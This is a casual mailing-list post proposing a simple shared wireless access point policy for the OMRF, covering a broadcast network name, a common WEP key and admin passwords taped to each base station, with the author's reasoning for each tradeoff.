I was talking to Quyen and Todd, and we came up with a short, easy-to-follow preliminary wireless security idea. I decided to post this to the group and see what you guys thought. If you think it's a good idea, maybe we can all follow it. Of coure, this is only for people who wish to make their wireless access points available to everyone at the OMRF. I don't know how much of this is already implemented, so I could be echoing someone's already-implemented ideas. I'll call that "delayed synchronicity" so it sounds better than "duh". Here's the idea: - All Wireless Base Stations that are intended for OMRF use have the same community name, and the community names are set to broadcast (ie not a "closed network" as several systems call it) - If we use a WEP password, we all use the same WEP key, and make it easy to remember (preferably 48-bit, as that seems to be the most common denominator for all 802.11b wireless cards) - All base stations have a unique password, preferably totally random and not easy to remember (example that is somewhat like what we use: a48b9_R). Every base station would have its password written on a piece of paper taped to the base station. Alright, this looks like really bad security. It's not quite so bad as it seems, and it still meets our requirements for being easy to use. Let me explain: First, the community name can be picked up off the wire easily unless we use some sort of junk broadcaster, so why not broadcast it? We want our users to be able to find it easily. Also, this makes it to where we can walk across the OMRF and not have to adapt to the local fiefdom just to get network access. Second, if we have a shifting WEP password, many systems will not let you store multiple WEP passwords for the same community, therefore we'll constantly be futzing with the thing, and it will be far more likely that someone will take to posting all the passwords, and we're just back to where we were. Also, WEP at the levels that we will have access to (48-bit, if we want to allow everyone to use the network) is a trivial crack for someone who wants in (ie is sufficiently bored or interested), so this is mostly for keeping people out who wander in by accident, or just want to tap in on a lark. Besides, network-level security should not be our only line of defense. As for the base stations: what we're really concerned about is someone who does not have access to the lab getting in and messing with the controls of our access points. To get the password for the access point, someone would have to have physical access to the lab and have the desire to learn the password. As the password is random, it is not something you just look at and know, hence they would have to intend to break in when they looked at the password. Not great security, but not awful. The reason for giving out the password at all is so that others can come in and fix your access point if it mis-behaves without unplugging it or resetting it. If your access point is set to run a DHCP server, you will earn the concern if not the ire of the network boys (understandably). Not that I know anyone who's done that (cough, cough). The main system administrators and people who have a good reason to be there can get physical access to where the AP is at all times. This easily gets them the ability to manage instead of blow away your access point. Now, why not use the same password for all APs? We could do that, but then everyone who ran an AP would have the password for all other APs for ever and ever. Not to mention we'd have to take precautions about whom to give passwords to, and anyone who had the password would be responsible for the entire OMRF. And it smacks of centralization, and there's really no need for that. So, that's the idea. Todd, Quyen, any corrections? Anyone else: any suggestions? Anyone interested in doing this? Any proposed community names, WEP keys? Happy to help (or at least cause problems), Alan